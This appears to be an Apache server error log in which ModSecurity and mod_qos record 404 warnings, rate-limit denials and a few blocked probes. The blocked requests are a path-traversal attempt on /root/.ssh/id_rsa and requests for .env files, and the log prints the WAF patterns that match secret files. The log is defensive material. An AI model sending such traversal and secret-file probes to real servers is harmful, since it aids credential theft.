[Tue May 26 19:54:06.344813 2026] [security2:error] [pid 93867:tid 94233] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs5QAAAYI"]
[Tue May 26 19:54:06.350879 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GLQAAAgc"]
[Tue May 26 19:54:06.367243 2026] [security2:error] [pid 93867:tid 94229] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs5AAAAYA"]
[Tue May 26 19:54:06.388194 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K05gAAALE"]
[Tue May 26 19:54:06.388872 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GWAAAAgs"]
[Tue May 26 19:54:06.394552 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GVgAAAaI"]
[Tue May 26 19:54:06.398741 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GWgAAAbw"]
[Tue May 26 19:54:06.413876 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K04AAAAKw"]
[Tue May 26 19:54:06.420398 2026] [security2:error] [pid 93867:tid 94027] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs8wAAARc"]
[Tue May 26 19:54:06.422783 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K03QAAAMc"]
[Tue May 26 19:54:06.430941 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNJwAAAA0"]
[Tue May 26 19:54:06.443517 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K04wAAAOM"]
[Tue May 26 19:54:06.444010 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GTwAAAZQ"]
[Tue May 26 19:54:06.449415 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K02wAAALU"]
[Tue May 26 19:54:06.453633 2026] [security2:error] [pid 93868:tid 94372] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GWwAAAgE"]
[Tue May 26 19:54:06.461783 2026] [security2:error] [pid 86490:tid 86739] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/alerts/.env"] [unique_id "ahWtBlZMwN0DpLVWo6K1MAAAAPw"]
[Tue May 26 19:54:06.467414 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GUgAAAbA"]
[Tue May 26 19:54:06.609030 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBlZMwN0DpLVWo6K1TgAAAMM
[Tue May 26 19:54:06.609769 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1TQAAAKw
[Tue May 26 19:54:06.611121 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBmDRMqfxdEDkoszNQgAAAGM
[Tue May 26 19:54:06.612719 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBmDRMqfxdEDkoszNRAAAAAc
[Tue May 26 19:54:06.615783 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1TwAAALw
[Tue May 26 19:54:06.620581 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBmDRMqfxdEDkoszNSAAAAHs
[Tue May 26 19:54:06.620973 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBmDRMqfxdEDkoszNSQAAAGw
[Tue May 26 19:54:06.624610 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNSgAAAAA
[Tue May 26 19:54:06.628039 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1UwAAAJA
[Tue May 26 19:54:06.632158 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBmDRMqfxdEDkoszNTAAAACE
[Tue May 26 19:54:06.760886 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNUAAAAGI
[Tue May 26 19:54:06.762702 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1VgAAAIY
[Tue May 26 19:54:06.762701 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1VwAAAOM
[Tue May 26 19:54:06.765504 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1WAAAAOI
[Tue May 26 19:54:06.768864 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNUQAAAGs
[Tue May 26 19:54:06.769935 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1WQAAANU
[Tue May 26 19:54:06.772267 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNUgAAADQ
[Tue May 26 19:54:06.776989 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNUwAAABk
[Tue May 26 19:54:06.780008 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1WgAAAP0
[Tue May 26 19:54:06.785120 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1XAAAALU
[Tue May 26 19:54:06.909877 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNXAAAAFc
[Tue May 26 19:54:06.912795 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1XgAAANg
[Tue May 26 19:54:06.913426 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1XwAAAJo
[Tue May 26 19:54:06.917874 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNXQAAAEk
[Tue May 26 19:54:06.919862 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1YAAAAPw
[Tue May 26 19:54:06.920481 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1YQAAAIw
[Tue May 26 19:54:06.921872 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNXgAAADw
[Tue May 26 19:54:06.926846 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBmDRMqfxdEDkoszNXwAAAH8
[Tue May 26 19:54:06.934815 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1YgAAAM0
[Tue May 26 19:54:06.937004 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1YwAAAJw
[Tue May 26 19:54:06.945060 2026] [security2:error] [pid 86490:tid 86697] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/..%2F..%2F..%2F..%2F..%2Froot/.ssh/id_rsa"] [unique_id "ahWtBlZMwN0DpLVWo6K1ZAAAANI"]
[Tue May 26 19:54:07.142549 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB2DRMqfxdEDkoszNYQAAAEQ
[Tue May 26 19:54:07.145055 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1ZwAAAPo
[Tue May 26 19:54:07.145311 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1aAAAAJI
[Tue May 26 19:54:07.234724 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB2DRMqfxdEDkoszNZgAAAGQ
[Tue May 26 19:54:07.234735 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtB2DRMqfxdEDkoszNZwAAADk
[Tue May 26 19:54:07.234923 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1agAAAMM
[Tue May 26 19:54:07.235061 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1awAAAMc
[Tue May 26 19:54:07.235981 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB2DRMqfxdEDkoszNaAAAACA
[Tue May 26 19:54:07.240132 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1bAAAAKw
[Tue May 26 19:54:07.242152 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtB1ZMwN0DpLVWo6K1bgAAAMI
[Tue May 26 19:54:07.280306 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GXAAAAdQ"]
[Tue May 26 19:54:07.281308 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GWQAAAa4"]
[Tue May 26 19:54:07.281376 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K06QAAANA"]
[Tue May 26 19:54:07.287106 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K02QAAAJ8"]
[Tue May 26 19:54:07.287946 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K08gAAAK8"]
[Tue May 26 19:54:07.288957 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GYQAAAd0"]
[Tue May 26 19:54:07.290012 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GXQAAAfU"]
[Tue May 26 19:54:07.299368 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K05QAAAKc"]
[Tue May 26 19:54:07.300077 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GYAAAAb4"]
[Tue May 26 19:54:07.328596 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K07AAAAPY"]
[Tue May 26 19:54:07.342893 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1AQAAALY"]
[Tue May 26 19:54:07.344943 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GagAAAbQ"]
[Tue May 26 19:54:07.348057 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K08QAAAL8"]
[Tue May 26 19:54:07.350156 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K09AAAANk"]
[Tue May 26 19:54:07.365162 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GeAAAAZc"]
[Tue May 26 19:54:07.373181 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNMgAAAAQ"]
[Tue May 26 19:54:07.379762 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GbAAAAf8"]
[Tue May 26 19:54:07.381368 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GdgAAAfk"]
[Tue May 26 19:54:07.390722 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GbwAAAb8"]
[Tue May 26 19:54:07.398029 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBkqK9k_ZUB2Vp25GbgAAAe0"]
[Tue May 26 19:54:07.411346 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNLQAAAD4"]
[Tue May 26 19:54:07.411908 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1NQAAAI0"]
[Tue May 26 19:54:07.415809 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1JgAAAJY"]
[Tue May 26 19:54:07.425859 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K1FQAAAOU"]
[Tue May 26 19:54:07.430093 2026] [security2:error] [pid 86490:tid 86682] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/config/.env"] [unique_id "ahWtB1ZMwN0DpLVWo6K1eAAAAMM"]
[Tue May 26 19:54:07.432199 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNLwAAACo"]
